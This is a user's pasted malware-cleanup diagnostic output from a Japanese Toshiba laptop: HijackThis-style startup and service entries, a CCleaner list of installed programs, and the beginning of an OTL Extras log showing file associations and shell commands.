O2 - BHO: Microsoft アカウント サインイン ヘルパー - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: SkypeIEPluginBHO - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: URLRedirectionBHO - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~2\MIF5BA~1\Office14\URLREDIR.DLL
O2 - BHO: TmBpIeBHO - {BBACBAFD-FA5E-4079-8B33-00EB9F13D4AC} - C:\Program Files (x86)\NTTW\SECURITY\AMSP\Module\20002\7.5.1144\7.5.1144\TmBpIe32.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_45\bin\jp2ssv.dll
O2 - BHO: Yahoo!ツールバーヘルパー - {EEBA90E6-2B14-413F-9BF8-61A8BDF92258} - C:\Program Files (x86)\Yahoo!J\Toolbar\8_0_0_3\Modules\YahooToolBar.dll
O2 - BHO: TOSHIBA Media Controller Plug-in - {F3C88694-EFFA-4d78-B409-54B7B2535B14} - C:\Program Files (x86)\TOSHIBA\TOSHIBA Media Controller Plug-in\TOSHIBAMediaControllerIE.dll
O3 - Toolbar: Yahoo!ツールバー - {AEF44653-C059-42CB-A5B7-41C640DA4A67} - C:\Program Files (x86)\Yahoo!J\Toolbar\8_0_0_3\Modules\YahooToolBar.dll
O3 - Toolbar: セキュリティツールバー - {CCAC5586-44D7-4c43-B64A-F042461A97D2} - C:\Program Files (x86)\NTTW\SECURITY\SEC\UIFramework\ToolbarIE.dll
O4 - HKLM\..\Run: [TSUScheduler] %ProgramFiles(x86)%\TOSHIBA\Sync Utility\TosSyncScheduler.exe
O4 - HKLM\..\Run: [dynabook Portal Gadget] "C:\Program Files (x86)\dynabook Portal Gadget\dynabook Portal Gadget.exe" -atboottime
O4 - HKLM\..\Run: [FlipViewer Library] "C:\Program Files (x86)\E-Book Systems\FlipViewer\FlipViewerLibrary.exe" /showmode=hide
O4 - HKLM\..\Run: [TiltMouse] C:\windows\TiltMouseAPP.exe
O4 - HKLM\..\Run: [AIOKBApp] C:\windows\AIOKBApp.exe
O4 - HKLM\..\Run: [TSleepSrv] %ProgramFiles(x86)%\TOSHIBA\TOSHIBA Sleep Utility\TSleepSrv.exe
O4 - HKLM\..\Run: [ToshibaServiceStation] "C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe" /hide:60
O4 - HKLM\..\Run: [TRCMan] C:\Program Files (x86)\TOSHIBA\TRCMan\TRCMan.exe
O4 - HKLM\..\Run: [TKRTL] %ProgramFiles%\TOSHIBA\TKRTL\KarteLite.exe -h
O4 - HKLM\..\Run: [TWebCamera] "C:\Program Files (x86)\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe" autorun
O4 - HKLM\..\Run: [IME14 JPN Setup] C:\PROGRA~2\COMMON~1\MICROS~1\IME14\SHARED\IMEKLMG.EXE /SetPreload /JPN /Log
O4 - HKLM\..\Run: [NTTW_OSA_AUS] "C:\Program Files (x86)\NTTW\OSA_Aus\acs.exe" -silent
O4 - HKLM\..\Run: [TAVLauncher] C:\Program Files (x86)\TOSHIBA\AVApplication\Application\TAVLauncher.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O4 - HKCU\..\Run: [BingSvc] C:\Users\USER\AppData\Local\Microsoft\BingSvc\BingSvc.exe
O4 - HKUS\S-1-5-18\..\RunOnce: [SPReview] "C:\windows\System32\SPReview\SPReview.exe" /sp:1 /errorfwlink:"http://go.microsoft.com/fwlink/?LinkID=122915" /build:7601 (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [SPReview] "C:\windows\System32\SPReview\SPReview.exe" /sp:1 /errorfwlink:"http://go.microsoft.com/fwlink/?LinkID=122915" /build:7601 (User 'Default user')
O4 - Global Startup: スタートアップツール.lnk = ?
O9 - Extra button: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1004 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1003 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra button: OneNote に送る - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: OneNote に送る(&N) - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra button: 故障かな？と思ったら・・・ - {6CB1FA39-5745-4733-859F-E9C82A68F848} - C:\Program Files (x86)\NTTW\OSA_SupportTool\start_w.exe
O9 - Extra button: OneNote リンク ノート(&K) - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O9 - Extra 'Tools' menuitem: OneNote リンク ノート(&K) - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O9 - Extra button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O9 - Extra button: TOSHIBA Bulletin Boardへ追加 - {97F922BD-8563-4184-87EE-8C4ACA438823} - C:\Program Files\TOSHIBA\BulletinBoard\TosBBCom.dll
O9 - Extra 'Tools' menuitem: TOSHIBA Bulletin Boardへ追加 - {97F922BD-8563-4184-87EE-8C4ACA438823} - C:\Program Files\TOSHIBA\BulletinBoard\TosBBCom.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - Trusted Zone: http://dynabook.fresheye.com (HKLM)
O15 - Trusted Zone: http://www.ig.gmodules.com (HKLM)
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O18 - Protocol: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O18 - Protocol: tmbp - {1A77E7DC-C9A0-4110-8A37-2F36BAE71ECF} - C:\Program Files (x86)\NTTW\SECURITY\AMSP\Module\20002\7.5.1144\7.5.1144\TmBpIe32.dll
O18 - Protocol: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} - C:\Program Files (x86)\NTTW\SECURITY\AMSP\Module\20004\2.5.1331\6.8.1094\TmIEPlg32.dll
O18 - Protocol: tmtb - {04EAF3FB-4BAC-4B5A-A37D-A1CF210A5A42} - C:\Program Files (x86)\NTTW\SECURITY\SEC\UIFramework\ToolbarIE.dll
O18 - Protocol: tmtbim - {0B37915C-8B98-4B9E-80D4-464D2C830D10} - C:\Program Files (x86)\NTTW\SECURITY\SEC\UIFramework\ProToolbarIMRatingActiveX.dll
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
O18 - Filter hijack: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\windows\System32\alg.exe (file missing)
O23 - Service: Security Solution Platform (Amsp) - Trend Micro Inc. - C:\Program Files (x86)\NTTW\SECURITY\AMSP\coreServiceShell.exe
O23 - Service: Apple Mobile Device Service - Apple Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: Bonjour サービス (Bonjour Service) - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: ConfigFree WiMAX Service (cfWiMAXService) - TOSHIBA CORPORATION - C:\Program Files (x86)\TOSHIBA\ConfigFree\CFIWmxSvcs64.exe
O23 - Service: CLHNService - Unknown owner - C:\Program Files (x86)\CyberLink\SoftDMA\Kernel\DMP\CLHNService.exe
O23 - Service: ConfigFree プロファイルサービス (ConfigFree Service) - TOSHIBA CORPORATION - C:\Program Files (x86)\TOSHIBA\ConfigFree\CFSvcs.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\windows\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\windows\system32\fxssvc.exe (file missing)
O23 - Service: Google Update サービス (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update サービス (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: IconMan_R - Realsil Microelectronics Inc. - C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\windows\system32\IEEtwCollector.exe (file missing)
O23 - Service: iPod サービス (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\windows\system32\lsass.exe (file missing)
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: McAfee Activation Service (McAWFwk) - Unknown owner - c:\PROGRA~1\mcafee\msc\mcawfwk.exe (file missing)
O23 - Service: McAfee OOBE Service (McOobeSv) - Unknown owner - C:\Program Files\Common Files\McAfee\McSvcHost\McSvHost.exe (file missing)
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\windows\system32\lsass.exe (file missing)
O23 - Service: Protexis Licensing V2 (PSI_SVC_2) - Protexis Inc. - c:\Program Files (x86)\Common Files\Protexis\License Service\PsiService_2.exe
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\windows\system32\sppsvc.exe (file missing)
O23 - Service: Qosmio AV Center Complement Service (TAVComplementService) - TOSHIBA Corporation - C:\Program Files (x86)\TOSHIBA\AVApplication\Engine\TAVComplementService.exe
O23 - Service: Qosmio AV Center Scheduler Service (TAVScheduler) - TOSHIBA Corporation - C:\Program Files (x86)\TOSHIBA\AVApplication\Application\TAVScheduler.exe
O23 - Service: TMachInfo - TOSHIBA Corporation - C:\Program Files (x86)\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe
O23 - Service: TOSHIBA Optical Disc Drive Service (TODDSrv) - Unknown owner - C:\windows\system32\TODDSrv.exe (file missing)
O23 - Service: TOSHIBA Power Saver (TosCoSrv) - TOSHIBA Corporation - C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe
O23 - Service: TOSHIBA eco Utility Service - TOSHIBA Corporation - C:\Program Files\TOSHIBA\TECO\TecoService.exe
O23 - Service: TOSHIBA HDD SSD Alert Service - TOSHIBA Corporation - C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe
O23 - Service: TOSHIBA TosRzTf Control Service (TosRzTfSvc) - TOSHIBA Corporation - C:\Program Files (x86)\TOSHIBA\RegzaLinkDubbing\TosRzTfSvc.exe
O23 - Service: TPCHKarteSVC - TOSHIBA Corporation - C:\Program Files (x86)\TOSHIBA\TKRTL\TPCHKarteSVC.exe
O23 - Service: TPCH Service (TPCHSrv) - TOSHIBA Corporation - C:\Program Files\TOSHIBA\TPHM\TPCHSrv.exe
O23 - Service: UDSS - Unknown owner - c:\Program Files (x86)\Common Files\Ulead Systems\UDSS\UDSS.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\windows\system32\UI0Detect.exe (file missing)
O23 - Service: Ulead Burning Helper (UleadBurningHelper) - Ulead Systems, Inc. - C:\Program Files (x86)\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
O23 - Service: Intel(R) Management & Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\windows\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 14709 bytes


CCログ


Adobe Flash Player 17 ActiveX Adobe Systems Incorporated 2015/04/21 6.00 MB 17.0.0.169
Adobe Flash Player 17 NPAPI Adobe Systems Incorporated 2015/04/21 6.00 MB 17.0.0.169
Apple Application Support（32 ビット） Apple Inc. 2015/04/21 94.2 MB 3.1.3
Apple Application Support（64 ビット） Apple Inc. 2015/04/21 107 MB 3.1.3
Apple Mobile Device Support Apple Inc. 2015/04/21 27.9 MB 8.1.1.3
Apple Software Update Apple Inc. 2014/04/02 2.38 MB 2.1.3.127
Atheros Communications Inc.(R) AR81Family Gigabit/Fast Ethernet Driver Atheros Communications Inc. 2014/03/19 1.0.0.27
Bonjour Apple Inc. 2014/04/02 2.00 MB 3.0.0.10
Canon MP493 series MP Drivers Canon Inc. 2014/03/24
CCleaner Piriform 2015/04/18 5.04
Corel Digital Studio SE Corel Corporation 2015/04/21 850 MB 1.5.10.200
DigiBookBrowser Version 1.5.1.4 TriWorks Corp.JAPAN 2010/12/01 8.47 MB 1.5.1.4
dynabook Portal Gadget TOSHIBA CORPRATION 2010/12/01 508 KB 2.1.0
dynabookランチャー 東芝情報機器株式会社 2010/12/01 839 KB 3.1.0
dynabookランチャー用バナー 2015/04/21
ebi.BookReader3J eBOOK Initiative Japan Co., Ltd. 2010/12/01 17.7 MB 3.70.41
ebi.SampleContents eBOOK Initiative Japan Co., Ltd. 2010/12/01 3.7.0.41_MSI_T
FlipViewer 4.5 E-Book Systems Inc. 2010/12/01 16.7 MB 4.5.1
Google Chrome Google Inc. 2014/04/30 38.0.2125.111
iCloud Apple Inc. 2015/02/03 90.8 MB 4.0.6.28
Intel(R) Graphics Media Accelerator Driver Intel Corporation 8.15.10.2281
Intel(R) Management Engine Components Intel Corporation 6.0.0.1179
Intel(R) Rapid Storage Technology Intel Corporation 9.6.1.1001
iTunes Apple Inc. 2015/04/21 233 MB 12.1.2.27
Java 8 Update 45 Oracle Corporation 2015/04/18 77.1 MB 8.0.450
LaLaVoice V9.60 2015/04/21 9.60.001
LibreOffice 4.2.2.1 The Document Foundation 2014/03/21 439 MB 4.2.2.1
LINE LINE Corporation 2015/04/21 3.7.4.97
LoiLoScope LoiLo 2010/12/01 83.0 MB 1.8.33
Microsoft .NET Framework 4.5.2 Microsoft Corporation 2015/04/08 38.8 MB 4.5.51209
Microsoft .NET Framework 4.5.2 (日本語) Microsoft Corporation 2015/04/16 2.93 MB 4.5.51209
Microsoft Office 2010 Microsoft Corporation 2014/09/25 14.0.7015.1000
Microsoft Office ナビ 2010 Microsoft Corporation 2014/09/25 17.1 MB 14.0.7015.1000
Microsoft OneDrive Microsoft Corporation 2014/09/24 26.7 MB 17.0.4035.0328
Microsoft Outlook Hotmail Connector 64 ビット Microsoft Corporation 2014/09/24 4.60 MB 14.0.5118.5000
Microsoft Primary Interoperability Assemblies 2005 Microsoft Corporation 2010/12/01 7.75 MB 9.0.21022
Microsoft Silverlight Microsoft Corporation 2014/09/25 50.7 MB 5.1.30514.0
Microsoft SQL Server 2005 Microsoft Corporation 2015/04/21
Microsoft SQL Server 2005 Compact Edition [ENU] Microsoft Corporation 2010/12/01 1.69 MB 3.1.0000
Microsoft SQL Server Compact 3.5 SP1 English Microsoft Corporation 2014/03/19 2.59 MB 3.5.5692.0
Microsoft SQL Server Native Client Microsoft Corporation 2014/09/25 5.86 MB 9.00.5000.00
Microsoft SQL Server VSS Writer Microsoft Corporation 2014/09/25 1.12 MB 9.00.5000.00
Microsoft SQL Server セットアップ サポート ファイル (英語) Microsoft Corporation 2014/09/25 31.7 MB 9.00.5000.00
Microsoft Visual C++ 2005 Redistributable Microsoft Corporation 2014/09/25 292 KB 8.0.61001
Microsoft Visual C++ 2005 Redistributable (x64) Microsoft Corporation 2014/03/19 620 KB 8.0.61000
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 Microsoft Corporation 2010/12/01 788 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 Microsoft Corporation 2014/09/25 788 KB 9.0.30729.6161
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 Microsoft Corporation 2010/12/01 598 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 Microsoft Corporation 2010/12/01 596 KB 9.0.30729
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 Microsoft Corporation 2014/09/25 600 KB 9.0.30729.6161
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 Microsoft Corporation 2015/02/13 13.8 MB 10.0.40219
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 Microsoft Corporation 2015/02/13 11.1 MB 10.0.40219
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Microsoft Corporation 2015/02/13 10.0.50903
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - 日本語 Microsoft Corporation 2015/02/13 10.0.50903
MSXML 4.0 SP2 (KB941833) Microsoft Corporation 2010/12/01 1.26 MB 4.20.9849.0
MSXML 4.0 SP2 (KB954430) Microsoft Corporation 2014/03/21 1.27 MB 4.20.9870.0
MSXML 4.0 SP2 (KB973688) Microsoft Corporation 2014/03/21 1.33 MB 4.20.9876.0
NTT西日本 リモートサポートツール 西日本電信電話株式会社 2014/03/24
Nuvoton CIR Device Drivers Nuvoton Technology Corporation 2014/03/19 3.40 MB 8.60.2002
PCあんしん点検ユーティリティ TOSHIBA Corporation 2014/03/19 2.87 MB 1.1.1.0
PC引越ナビ 東芝情報機器株式会社 2010/12/01 12.6 MB 4.1.0
PlayReady PC Runtime amd64 Microsoft Corporation 2010/12/01 2.05 MB 1.3.0
Qosmio AV Center TOSHIBA CORPORATION 2014/04/05 6.5.1.0
QuickTime 7 Apple Inc. 2014/10/26 70.2 MB 7.76.80.95
Realtek High Definition Audio Driver Realtek Semiconductor Corp. 2015/04/21 6.0.1.6132
Realtek PCIE Card Reader Realtek Semiconductor Corp. 2014/04/05 6.1.7601.83
Realtek WLAN Driver REALTEK Semiconductor Corp. 2014/03/19 2.00.0013
Search App by Ask
Skype Click to Call Microsoft Corporation 2015/04/19 9.91 MB 7.3.16540.9015
Skype(TM) 7.3 Skype Technologies S.A. 2015/04/19 49.2 MB 7.3.101
SoftDMA CyberLink Corp. 2015/04/21 1.5.8302
The Desktop Weather 1.0 Baidu Japan Inc. 2014/12/30 1.0.0.35
TOSHIBA Bulletin Board TOSHIBA Corporation 2015/04/21 2.0.10.64
TOSHIBA ConfigFree TOSHIBA CORPORATION 2014/03/19 91.5 MB 8.0.35
TOSHIBA Disc Creator TOSHIBA Corporation 2014/03/19 8.45 MB 2.1.0.4 for x64
TOSHIBA DVD PLAYER TOSHIBA Corporation 2014/03/19 3.01.3.00-B
TOSHIBA ecoユーティリティ TOSHIBA Corporation 2014/03/19 7.22 MB 1.2.20.64
TOSHIBA Face Recognition TOSHIBA Corporation 2015/04/21 3.1.5.64
TOSHIBA Hardware Setup TOSHIBA Corporation 2015/04/21 2.00.02
TOSHIBA Media Controller TOSHIBA CORPORATION 2014/03/19 1.0.85.4
TOSHIBA Media Controller Plug-in TOSHIBA CORPORATION 2014/03/19 4.89 MB 1.0.5.13
TOSHIBA PC Health Monitor TOSHIBA Corporation 2014/03/19 28.7 MB 1.7.2.64
TOSHIBA Recovery Media Creator TOSHIBA Corporation 2010/12/01 2.89 MB 2.1.0.5 for x64
TOSHIBA ReelTime TOSHIBA Corporation 2015/04/21 1.7.16.64
TOSHIBA Remote Control Manager TOSHIBA CORPORATION 2014/03/19 3.0.4.2
TOSHIBA SD-Video PLAYER TOSHIBA Corporation 2014/03/19 1.00.1.01-B
TOSHIBA Service Station TOSHIBA 2015/04/16 2.2.14
TOSHIBA Sleep Utility TOSHIBA Corporation 2014/03/19 1.4.1.5
TOSHIBA Speech Engines Version V9.50 2015/04/21
TOSHIBA Speech System MT Engine Version 9.0 2015/04/21
Toshiba Speech System NLS TTS Engine(U.S.) Version1.0 2015/04/21
TOSHIBA Supervisor Password TOSHIBA Corporation 2015/04/21 2.00.01
TOSHIBA Value Added Package TOSHIBA Corporation 2014/03/19 65.6 MB 1.3.19.64W
TOSHIBA Web Camera Application TOSHIBA Corporation 2014/03/19 13.6 MB 1.1.5.7
Toshiba Wireless HID driver TOSHIBA Corporation 2014/04/05 1.00.006
TOSHIBA 無線LANらくらく設定 TOSHIBA CORPORATION 2010/12/01 19.6 MB 2.0.10.0628.1115
Windows Live Essentials Microsoft Corporation 2014/09/24 16.4.3528.0331
Yahoo!ツールバー Yahoo! JAPAN. 2015/04/21 4.01 MB 8.0.0.3
いつもNAVI PC ZENRIN 2010/12/01 6.1.2
おたすけナビ 東芝情報機器株式会社 2010/12/01 20.2 MB 6.1.0
おまかせフォトムービー TOSHIBA CORPORATION 2014/03/19 390 MB 1.1.1500.1
ぱらちゃんV2.3 TOSHIBA Corporation 2010/12/01 33.7 MB 2.3.16
スタートアップツール 西日本電信電話株式会社 2015/02/02 2.61 MB 7.3
セキュリティ対策ツール 西日本電信電話株式会社 2014/03/24 450 MB 6.11
セキュリティ申込・設定ツール 西日本電信電話株式会社 2014/03/24 3.58 MB 6.0.0.7
パソコンで見るマニュアル TOSHIBA CORPORATION 2010/12/01 30.7 MB 0066.02.2101
レグザリンク・ダビング TOSHIBA CORPORATION 2014/04/05 1.0.5.1
動画で学ぶシリーズ TOSHIBA CORPORATION 2010/12/01 554 MB 2010.0302.0001
動画で解決！操作ガイド 東芝情報機器株式会社 2010/12/01 15.9 MB 2.1.0
動画で解決！操作ガイド－コンテンツ－ 東芝情報機器株式会社 2010/12/01 144 KB 2.1.0
東芝HDD/SSDアラータ TOSHIBA Corporation 2010/12/01 39.1 MB 3.1.64.6
東芝ジェスチャコントローラ TOSHIBA Corporation 2015/04/21 2.7.0.9
東芝ファイル同期ユーティリティ TOSHIBA Corporation 2010/12/01 2.0.1
診断復旧ツール 西日本電信電話株式会社 2014/06/24 12.5 MB

了解しました。
先にExtras.txt のログを貼っておきます。
OTL Extras logfile created on: 2015/04/21 1:47:20 - Run 1
OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\ryota\Desktop
64bit- An unknown product (Version = 6.3.9600) - Type = NTWorkstation
Internet Explorer (Version = 9.11.9600.17728)
Locale: 00000411 | Country: 日本 | Language: JPN | Date Format: yyyy/MM/dd

7.88 Gb Total Physical Memory | 6.58 Gb Available Physical Memory | 83.54% Memory free
9.13 Gb Paging File | 7.90 Gb Available in Paging File | 86.54% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 456.99 Gb Total Space | 35.25 Gb Free Space | 7.71% Space Free | Partition Type: NTFS

Computer Name: NAMETUKI | User Name: ryota | Logged in as Administrator.
Boot Mode: SafeMode | Scan Mode: All users | Include 64bit Scans
Company Name Whitelist: Off | Skip Microsoft Files: Off | No Company Name Whitelist: On | File Age = 30 Days

[color=#E56717]========== Extra Registry (SafeList) ==========[/color]


[color=#E56717]========== File Associations ==========[/color]

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.html[@ = htmlfile] -- C:\Program Files\Internet Explorer\IEXPLORE.EXE (Microsoft Corporation)
.url[@ = InternetShortcut] -- C:\WINDOWS\SysNative\rundll32.exe (Microsoft Corporation)

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- C:\WINDOWS\SysWow64\control.exe (Microsoft Corporation)
.html [@ = htmlfile] -- C:\Program Files\Internet Explorer\IEXPLORE.EXE (Microsoft Corporation)

[HKEY_USERS\S-1-5-21-1488747381-3182991089-3951260014-1001\SOFTWARE\Classes\<extension>]
.html [@ = ChromeHTML] -- Reg Error: Key error. File not found

[color=#E56717]========== Shell Spawning ==========[/color]

[b]64bit:[/b] [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [edit] -- Reg Error: Key error.
htmlfile [open] -- "C:\Program Files\Internet Explorer\IEXPLORE.EXE" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\IEXPLORE.EXE" %1 (Microsoft Corporation)
htmlfile [print] -- "C:\WINDOWS\system32\rundll32.exe" "C:\WINDOWS\system32\mshtml.dll",PrintHTML "%1" (Microsoft Corporation)
http [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
https [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
inffile [install] -- %SystemRoot%\System32\InfDefaultInstall.exe "%1" (Microsoft Corporation)
InternetShortcut [open] -- "C:\WINDOWS\system32\rundll32.exe" "C:\WINDOWS\system32\ieframe.dll",OpenURL %l (Microsoft Corporation)
InternetShortcut [print] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\OpenWith.exe "%1" (Microsoft Corporation)
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Applications\iexplore.exe [open] -- "C:\Program Files\Internet Explorer\IEXPLORE.EXE" %1 (Microsoft Corporation)
CLSID\{871C5380-42A0-1069-A2EA-08002B30309D} [OpenHomePage] -- "C:\Program Files\Internet Explorer\iexplore.exe" (Microsoft Corporation)

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
htmlfile [edit] -- Reg Error: Key error.
htmlfile [open] -- "C:\Program Files\Internet Explorer\IEXPLORE.EXE" %1 (Microsoft Corporation)
htmlfile [opennew] -- "C:\Program Files\Internet Explorer\IEXPLORE.EXE" %1 (Microsoft Corporation)
http [open] -- "C:\Program Files\Internet Explorer\iexplore.exe" %1 (Microsoft Corporation)
